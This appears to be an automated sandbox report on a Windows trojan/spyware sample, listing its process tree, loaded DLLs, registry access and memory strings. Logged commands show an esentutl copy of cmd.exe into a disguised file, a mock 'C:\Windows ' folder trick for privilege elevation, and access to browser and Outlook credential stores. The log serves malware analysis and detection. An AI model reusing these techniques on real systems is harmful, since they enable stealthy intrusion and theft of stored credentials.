Source: E8q16bf9QD.exe, 00000000.00000003.1103403137.000000000081C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs E8q16bf9QD.exe
Source: E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EBB9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs E8q16bf9QD.exe
Source: E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EBB9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs E8q16bf9QD.exe
Source: E8q16bf9QD.exe, 00000000.00000003.1103403137.000000000084A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs E8q16bf9QD.exe
Source: E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EB60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs E8q16bf9QD.exe
Source: E8q16bf9QD.exe, 00000000.00000002.1163403517.000000007F039000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs E8q16bf9QD.exe
Source: E8q16bf9QD.exe, 00000000.00000002.1163403517.000000007F039000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs E8q16bf9QD.exe

Source: E8q16bf9QD.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/8@17/10

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02CF7B0E GetDiskFreeSpaceA,

0_2_02CF7B0E

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

File created: C:\Users\user\Links\iaoqralA.pif

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03

Source: C:\Windows\SysWOW64\systeminfo.exe

File created: C:\Users\user\AppData\Local\Temp\61b83Fh

Jump to behavior

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: systeminfo.exe, 00000014.00000003.1550492209.0000000000960000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000003.1548314187.0000000000956000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3574904730.0000000000984000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3574904730.0000000000956000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000003.1547908712.0000000000935000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: E8q16bf9QD.exe	Virustotal: Detection: 71%
Source: E8q16bf9QD.exe	ReversingLabs: Detection: 77%

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

File read: C:\Users\user\Desktop\E8q16bf9QD.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\E8q16bf9QD.exe "C:\Users\user\Desktop\E8q16bf9QD.exe"
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7520.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\843.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process created: C:\Users\user\Links\iaoqralA.pif C:\\Users\\user\\Links\iaoqralA.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process created: C:\Windows\System32\Sgrmuserer.exe C:\Windows\system32\Sgrmuserer.exe
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
Source: C:\Windows\SysWOW64\systeminfo.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7520.cmd	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\843.cmd	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Process created: C:\Users\user\Links\iaoqralA.pif C:\\Users\\user\\Links\iaoqralA.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: archiveint.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\Links\iaoqralA.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Program Files (x86)\aDHhcBmfvwmpREjhByMfuDXSNxMeXpZBOZjGnyzISNvqTmyArDKPrzcBRfRpgZBAWjenDISzlfIx\oSAWneqzPiahr.exe

Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\systeminfo.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: E8q16bf9QD.exe

Static file information: File size 1683456 > 1048576

Source: E8q16bf9QD.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x122400

Source:	Binary string: sysinfo.pdb source: iaoqralA.pif, 00000006.00000003.1366410561.000000001B8DD000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000003.1307066482.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000002.3575628985.0000000000A97000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sysinfo.pdbGCTL source: iaoqralA.pif, 00000006.00000003.1366410561.000000001B8DD000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000003.1307066482.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000013.00000002.3575628985.0000000000A97000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A63000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A10000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1163403517.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000002.1366673242.0000000000890000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: iaoqralA.pif, 00000006.00000002.1382063833.000000001BE20000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000003.1265788222.000000001BACD000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000003.1268898161.000000001BC77000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000002.1382063833.000000001BFBE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000003.1366284416.00000000041FF000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000003.1369833932.00000000043A3000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3576822678.0000000004550000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3576822678.00000000046EE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1137755418.0000000005890000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000002.1168643613.0000000000251000.00000020.00000001.01000000.00000008.sdmp, alpha.pif, 0000000A.00000002.1172361748.0000000000251000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.8.dr
Source:	Binary string: wntdll.pdb source: iaoqralA.pif, iaoqralA.pif, 00000006.00000002.1382063833.000000001BE20000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000003.1265788222.000000001BACD000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000003.1268898161.000000001BC77000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000002.1382063833.000000001BFBE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000014.00000003.1366284416.00000000041FF000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000003.1369833932.00000000043A3000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3576822678.0000000004550000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3576822678.00000000046EE000.00000040.00001000.00020000.00000000.sdmp
